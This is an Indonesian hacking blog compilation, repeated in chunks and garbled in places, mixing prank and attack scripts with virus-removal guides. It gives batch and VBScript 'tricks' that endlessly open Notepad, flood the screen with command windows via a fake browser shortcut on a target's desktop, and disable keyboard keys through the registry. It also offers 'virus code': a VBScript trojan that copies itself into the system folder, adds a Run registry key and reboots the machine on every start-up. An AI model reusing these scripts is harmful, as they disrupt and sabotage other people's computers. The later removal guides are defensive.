wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
-----------------------------------------------------------
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan diNotepad dengan nama : xhack.vbs
TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan diNotepad dengan nama : xhack.vbs
TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus
TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.
TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus
TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.
TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
-----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.BAT
TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------
start
start
start
start
start
start
start
start
start
start
start
start
simpan kode script berikut di Notepad dengan nama : xhack.BAT
TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------
start
start
start
start
start
start
start
start
start
start
start
start
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )
TRIK 12 - Cara Mematikan Tombol Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
Langsung kita mulai saja :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
—————————————
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
—————————————
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
—————————————
—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputernya.
Menghilangkan Trojan Horse Secara Manual
22:32
Trojan tu apaan ya ..??
Salam dari saya Backdoor Sakit Hati (1mp4ct_404)
”Trojan horse atau Kuda Troya, dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Dapat disebut sebagai Trojan saja (membuang kata horse).”(Wikipedia, 2008)
Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:
- Trojan bersifat “stealth” (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.
- Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.
Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Yunani bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.
Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang hacker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.
Mendeteksi keberadaan Trojan merupakan sebuah tindakan yang agak sulit dilakukan. Cara termudah adalah dengan melihat port-port mana yang terbuka dan sedang berada dalam keadaan “listening”, dengan menggunakan utilitas tertentu semacam Netstat. Hal ini dikarenakan banyak Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan “listening”) atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse.
Cara lainnya yang dapat digunakan adalah dengan membuat sebuah “snapshot” terhadap semua berkas program (*.EXE, *.DLL, *.COM, *.VXD, dan lain-lain) dan membandingkannya seiring dengan waktu dengan versi-versi terdahulunya, dalam kondisi komputer tidak terkoneksi ke jaringan. Hal ini dapat dilakukan dengan membuat sebuah checksum terhadap semua berkas program (dengan CRC atau MD5 atau mekanisme lainnya). Karena seringnya Trojan dimasukkan ke dalam direktori di mana sistem operasi berada (\WINDOWS atau \WINNT untuk Windows atau /bin, /usr/bin, /sbin, /usr/sbin dalam keluarga UNIX), maka yang patut dicurigai adalah berkas-berkas yang berada di dalam direktori tersebut. Banyak berkas yang dapat dicurigai, khususnya berkas-berkas program yang memiliki nama yang mirip dengan berkas yang “baik-baik” (seperti “svch0st.exe”, dari yang seharusnya “svchost.exe”, sebuah berkas yang dijalankan oleh banyak layanan sistem operasi Windows) dapat dicurigai sebagai Trojan Horse.
Cara terakhir adalah dengan menggunakan sebuah perangkat lunak antivirus, yang dilengkapi kemampuan untuk mendeteksi Trojan yang dipadukan dengan firewall yang memonitor setiap transmisi yang masuk dan keluar. Cara ini lebih efisien, tapi lebih mahal, karena umumnya perangkat lunak antivirus yang dipadukan dengan firewall memiliki harga yang lebih mahal dibandingkan dengan dua cara di atas (yang cenderung “gratis”). Memang, ada beberapa perangkat yang gratis, tapi tetap saja dibutuhkan waktu, tenaga dan uang untuk mendapatkannya (mengunduhnya dari Internet).
Tekan Ctrl + Alt + Del untuk menampilan Windows Task Manager – Lalu ke bagian “Processes”, terus klik bagian “User Name” untuk mengurutkan file yang diproses pada memori. Setelah itu, lihat ada bagian yang mencurigakan atau tidak. Bila banyak yang di-loading pada memori, sebaiknya dimatikan dahulu startup yang otomatis ter-loading pada bagian bawah kanan (ikon speaker dan jam). Matikan semua ikon-ikon tersebut dengan cara “quit” atau “exit” dari programnya.
Loading virus ke memori biasanya berupa EXE file. Langkah ini untuk mencegah virus untuk menyebar terlebih dahulu lewat memori kita. Matikan semua file EXE yang loading di memori kita yang sudah kita urutkan sebelumnya berdasarkan “User Name”. Jangan mematikan file yang kategori “System”, “Local Service”, dan “Network Service”, karena bisa membuat sistem kita Hang atau Freeze.
2. Tahap Kedua, Non-aktifkan Virus di Startup
Untuk menon-aktifkan virus supaya tidak terloading ke memori, kita harus membuangnya di startup. Caranya kita bisa menggunakan perintah MSCONFIG, klik menu Start>Run>msconfig – setelah itu akan tampil “System Configuration Utility”. Lalu pilihlah “Startup”, dalam kasus ini sebaiknya netter yang tidak mengerti mana yang loading virus mana yang bukan, sebaiknya pilih “Disable All”. Nantinya netter baru aktifkan kembali startup yang diinginkan kalau virus sudah bersih.
Untuk menon-aktifkan virus supaya tidak terloading ke memori, kita harus membuangnya di startup. Caranya kita bisa menggunakan perintah MSCONFIG, klik menu Start>Run>msconfig – setelah itu akan tampil “System Configuration Utility”. Lalu pilihlah “Startup”, dalam kasus ini sebaiknya netter yang tidak mengerti mana yang loading virus mana yang bukan, sebaiknya pilih “Disable All”. Nantinya netter baru aktifkan kembali startup yang diinginkan kalau virus sudah bersih.
Bila netter yang mengerti file yang loading mana file yang diperlukan, dan mana yang tidak, atau mana yang virus atau bukan, sebaiknya menbuang conteng (check box) pada kotak bagian kiri untuk yang dicurigai sebagai virus. Cara ini akan menonaktifkan virus di startup kita.
3. Tahap Ketiga, Hapus File Virus dari Komputer
Carilah dengan menggunakan fasilitas “search” pada WIndows, klik menu Start>Search, lalu carilah file EXE virus (contoh: Happy.exe) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari WIndows. Setelah ditemukan, delete atau hapus file tersebut.
Carilah dengan menggunakan fasilitas “search” pada WIndows, klik menu Start>Search, lalu carilah file EXE virus (contoh: Happy.exe) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari WIndows. Setelah ditemukan, delete atau hapus file tersebut.
4. Tahap Keempat, Hapus Virus dari System Registry
Tahap ini adalah tahap terakhir. Kita harus menggunakan perintah REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah Start>Run>regedit – lalu ke menu “Edit” pilihlah “Find” (atau tekan Ctrl+F). Masukkan nama file virus yang ingin kita hapus (contoh: Happy.exe), lalu pilih “Find Next”. Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut (berikut dengan foldernya kalau ada).
Tahap ini adalah tahap terakhir. Kita harus menggunakan perintah REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah Start>Run>regedit – lalu ke menu “Edit” pilihlah “Find” (atau tekan Ctrl+F). Masukkan nama file virus yang ingin kita hapus (contoh: Happy.exe), lalu pilih “Find Next”. Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut (berikut dengan foldernya kalau ada).
Kemudian lanjutkan dengan menekan tombol “F3″ atau di menu pilih “Edit” terus “Find Next”. Biasanya file virus diletakkan pada beberapa tempat di registry. Jadi pastikan netter menghapus semuanya sampai bersih, dalam arti registry komputer bebas dari loading virus tersebut. Karena kalau tidak pekerjaan ini akan sia-sia.
Membasmi Virus Dengan Bantuan Program Lain
Membasmi Virus Dengan Bantuan Program Lain
Ada beberapa tools yang sangat berguna bagi netter untuk mempermudah pembasmian virus, antara lain:
“CProcess – Tools ini fungsinya seperti “Windows Task Manager” (Ctrl + Alt +Del). Tools ini sangat bagus sekali untuk mengenali mana yang virus atau bukan karena mengandung informasi detil mengenai file yang terloading di memori. Seperti contoh file yang benar (bukan virus) selalu tertulis nama perusahaan pembuatnya (contoh: Windows buatan Microsoft Corp).”
“Hijack This – Tools yang sangat bagus sekali sebagai pengganti command MSCONFIG. Sering kali virus mematikan hak akses kita terhadap MSCONFIG supaya kita tidak bisa menghapus file virus yang ter-loading ketika Startup. Nah program ini berfungsi untuk menggantikan MSCONFIG yang tidak bisa aktif. Selain itu program ini bisa mendeteksi lebih mendetil seperti spyware yang inject di dalam browser kita (BHO), dan bisa menonaktifkannya..”
“CCleaner – Tools yang satu ini selain berguna untuk menggantikan command REGEDIT, juga bisa membersihkan virus di registry secara otomatis. Selain itu CCleaner juga bisa mempercepat akses Windows kamu dengan membersihkan semua sampah-sampah di dalam registry kamu.”
“PCMAV – Program antivirus buatan PC Media ini terbukti sangat ampuh untuk menghapus virus-virus Indo yang kadang-kadang suka rese.”
semohga bermanfaatSalam dari saya Backdoor Sakit Hati (1mp4ct_404)
Cara MEnghapus Paksa File Yang Terinfeksi Virus Dari CMD
22:29
Cara paling ampuh, meski sedikit rumit, untuk menghapus file yang terinfeksi Trojan, Virus dan Malware adalah menggunakan Command Prompt.
Begini langkahnya:
1. Buka Command Prompt dari Start menu, lalu Run, ketikkan cmddan tekan Enter atau klik Start > Accessories > Command Prompt.
2. Masukkan perintah berikut ke command line:
DEL /F /Q /A C:\Users\UserName\Desktop\file name.
Begini langkahnya:
1. Buka Command Prompt dari Start menu, lalu Run, ketikkan cmddan tekan Enter atau klik Start > Accessories > Command Prompt.
2. Masukkan perintah berikut ke command line:
DEL /F /Q /A C:\Users\UserName\Desktop\file name.
Penjelasan:
Perintah DEL untuk menghapus.
/F untuk memaksa agar system menghapus.
/Q untuk menjalankan mode penghapusan tanda konfirmasi.
/A untuk file dengan attribut (misalnya: file hidden, file read-only).
C:\dst. adalah lokasi direktori.
Perintah DEL untuk menghapus.
/F untuk memaksa agar system menghapus.
/Q untuk menjalankan mode penghapusan tanda konfirmasi.
/A untuk file dengan attribut (misalnya: file hidden, file read-only).
C:\dst. adalah lokasi direktori.
Contoh jika file yang terinfeksi bernama datadeni.docx, perintah command line-nya adalah:
DEL /F /Q /A C:\Users\DeniMulyadi\Desktop\datadeni.docx
DEL /F /Q /A C:\Users\DeniMulyadi\Desktop\datadeni.docx
Jika kamu ingin menghapus direktori, gunakan perintah command line berikut:
RD /S /Q C:\Users\DeniMulyadi\Desktop\Nama Folder
Perintah RD akan menghapus direktori, /S menghapus semua file dan sub folder dan /Q menghapus tanpa konfirmasi.
RD /S /Q C:\Users\DeniMulyadi\Desktop\Nama Folder
Perintah RD akan menghapus direktori, /S menghapus semua file dan sub folder dan /Q menghapus tanpa konfirmasi.
Metode yang sama juga bisa kamu lakukan untuk menghapus file dan folder pada umumnya.
Semoga Bermanfaat
salam dari saya Backdoor Sakit hati (1mp4ct_404()
Code-Code Virus
22:22
Berikut adalah code virus dari saya:
code pertama
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2?)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
cara menggunakanya simpan ke dalam Notepad dan simpan dengan nama misalnya trojan.vbs. existensi all file. ingat akhiranya harus vbs.
code kedua
rem - dlRB "DL Reboot" Trojan script by D.L.
On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"
sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")
set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function
function rebootSystem()
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
cara menggunakanya simpan ke dalam Notepad dan simpan dengan nama misalnya virus.vbs. existensi all file. ingat akhiranya harus vbs.
NOTE: Jangan pernah menjalankan virus tersebut di Laptop atau Komputer Ente karena bisa fatal akibatnya.
Sekian dari saya
Salam dari saya Backdoor Sakit Hati (1mp4ct_404)
code pertama
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2?)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
cara menggunakanya simpan ke dalam Notepad dan simpan dengan nama misalnya trojan.vbs. existensi all file. ingat akhiranya harus vbs.
code kedua
rem - dlRB "DL Reboot" Trojan script by D.L.
On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"
sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")
set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function
function rebootSystem()
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
cara menggunakanya simpan ke dalam Notepad dan simpan dengan nama misalnya virus.vbs. existensi all file. ingat akhiranya harus vbs.
NOTE: Jangan pernah menjalankan virus tersebut di Laptop atau Komputer Ente karena bisa fatal akibatnya.
Sekian dari saya
Salam dari saya Backdoor Sakit Hati (1mp4ct_404)
Cara Menhapus Virus Autorun Secara Manual
22:17
Virus autorun.inf memang cukup mengerikan karena saat sobat mencoba untuk mencolokan flashdisk ke komputer sobat maka dengan hitungan detik maka fungsi autorun dari virus tersebut langsung masuk dan komputer sobat saat itu juga langsung terinfeksi. Untuk sobat yang belum mematikan fungsi autorun dari windows, sobat bisa mencoba langkah berikut ini:
Cara Pertama
Cara KeduaStart - Run - tulis "gpedit.msc" (tanpa tada petik) - User Configuration - Administrative Templates - Windows Components - Autoplay Policies - Turn Off Autoplay (double klik) - Ceklist Enable - dan pilih all drives - OK / Apply
berikut ini :
1. Booting komputer dengan safe mode atau biasanya dengan menekan F8
2. Jalankan aplikasi dari bawaan windows, Command Prompt atau CMD (Start - Run - cmd.exe)
3. Ketikan drive USB tersebut (misalnya G: kemudian tekan [Enter])
4. Ketikan ATTRIB -R -A -S -H AUTORUN.INF, kemudian tekan [Enter]
5. Ketikan DEL AUTORUN.INF, kemudian tekan [Enter]
Setelah selesai, komputer dapat di Restart dalam mode Normal.
Penjelasan:
ATTRIB adalah modul yang dipergunakan untuk mengubah atribut sebuah file.
-R yaitu perintah untuk menghilangkan mode “Read Only”
-A yaitu perintah untuk menghilangkan mode “Archive”
-S yaitu perintah untuk menghilangkan mode “System”
-H yaitu perintah untuk menghilangkan mode “Hidden”
DEL yaitu perintah untuk menghapus file
3. Ketikan drive USB tersebut (misalnya G: kemudian tekan [Enter])
4. Ketikan ATTRIB -R -A -S -H AUTORUN.INF, kemudian tekan [Enter]
5. Ketikan DEL AUTORUN.INF, kemudian tekan [Enter]
Setelah selesai, komputer dapat di Restart dalam mode Normal.
Penjelasan:
ATTRIB adalah modul yang dipergunakan untuk mengubah atribut sebuah file.
-R yaitu perintah untuk menghilangkan mode “Read Only”
-A yaitu perintah untuk menghilangkan mode “Archive”
-S yaitu perintah untuk menghilangkan mode “System”
-H yaitu perintah untuk menghilangkan mode “Hidden”
DEL yaitu perintah untuk menghapus file
Semoga Bermanfaat
Salam Dari Saya Backdoor Sakit Hati (1mp4ct_404)
Cara menghapus Virus Trojan: W32/VBTroj.VNE (Rieysha)
22:10
Untuk pembersihan kali ini, kita akan menggunakan software Mini PE, silahkan download tools tersebut di alamat www.minipe.org, kemudian burn ke CD dan booting komputer dengan menggunakan CD tersebut. Setelah berhasil booting dengan menggunakan CD tersebut lakukan langkah pembersihan selanjutnya.
1. Hapus file virus di drive
Gunakan tools [Windows explorer] untuk memudahkan dalam mencari dan menghapus file induk virus.
- Klik [miniPE2XT]
- Klik [Programs]
- Klik [File Management]
- Klik [Windows Explorer]
Kemudian hapus file berikut:
o [C:\] atau Drive lain termasuk Flash disk
o C:\Windows
o C:\Windows\system32
o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe
[Contoh: Application Data90Admin.exe]
o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe
[Contoh: Application Data90r13y5h4ku.exe]
o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe
[Contoh: Startup90AVG Test Center.exe] 26 files
o C:\Documents and Settings\win321.exe
o C:\WINDOWS\Web\Printers\Write.exe
o C:\WINDOWS\Web\download.exe
o C:\Windows\Cursors\newCursor.exe
o C:\Windows\Debug\adminMode.exe
o C:\Windows\Font\rieyshaTrueType.exe
o C:\Windows\Help\userhelping.exe
o C:\Windows\java\packet.exe
o C:\Windows\Media\newmedia.exe
o C:\Windows\msagent\agentkvr.exe
o C:\Windows\registration\registy.exe
o C:\Windows\repair\setup.exe
o C:\windows\tasks\newScedule.exe
o C:\windows\system32\win34.exe
o C:\WINDOWS\system\oeminfo.exe
o C:\Windows\softwaredistribution\downloads.exe
o C:\Program Files\Internet Explorer
hacker.exe
IEfree.exe
Catatan:
Hapus file virus yang mempunyai ciri-ciri:
- Menggunakan icon
- Ukuran 228 KB
- Type file “Application”
- Ekstensi EXE
Untuk mempercepat pencarian sebaiknya menggunakan tools pencarian [Search], caranya:
- Buka [Windows Explorer]
- Klik tombol [Search]
- Pada kolom “Search for files or folders names” isi dengan format *.exe
- Pada kolom “Look in:” pilih drive yang akan di periksa
- kKik opsi [Search Options >>]
- Pilih opsi “Size”
? Pilih “At most”
? Isi 229
- Klik opsi “Advanced Options”
? Pilih opsi “Search System folders”
? Pilih opsi “Search hidden files and folders”
? Pilih opsi “Search subfolders”
- Klik tombol “Search Now” untuk memulai pencarian
- Kemdian hapus file virus yang berhasil ditemukan sesai dengan ciri-ciri yang telah disebutkan di atas.
Hapus juga file berikut:
- C:\CeweNakal.scr
- C:\Windows
? Oemlogo.pif
? TAKSMAN.com
? system32folder.htt
? system32desktop.ini
? system32pesan_dari_rieysha.txt
? system32pesan.doc
? system32Autorun.inf
? system32pesanku.bat
? system32pesanQ.htm
? system32klikAku.bat
? system32klik2kali.bat
? system32rieysha.jpg
- D:\Puisi.txt
2. Hapus/edit kembali registry yang sudah diubah virus
o Masih di Mini PE, klik
o Klik MiniPE2XT]
o Klik [Programs]
o Klik [Avast! Registry Editor]
o Klik [Registry Editor]
o Setelah muncul layar [Select File With Registry], klik tombol [Load selected OS registry], jika muncul layar konfirmasi, klik tombol [OK] (lihat gambar)
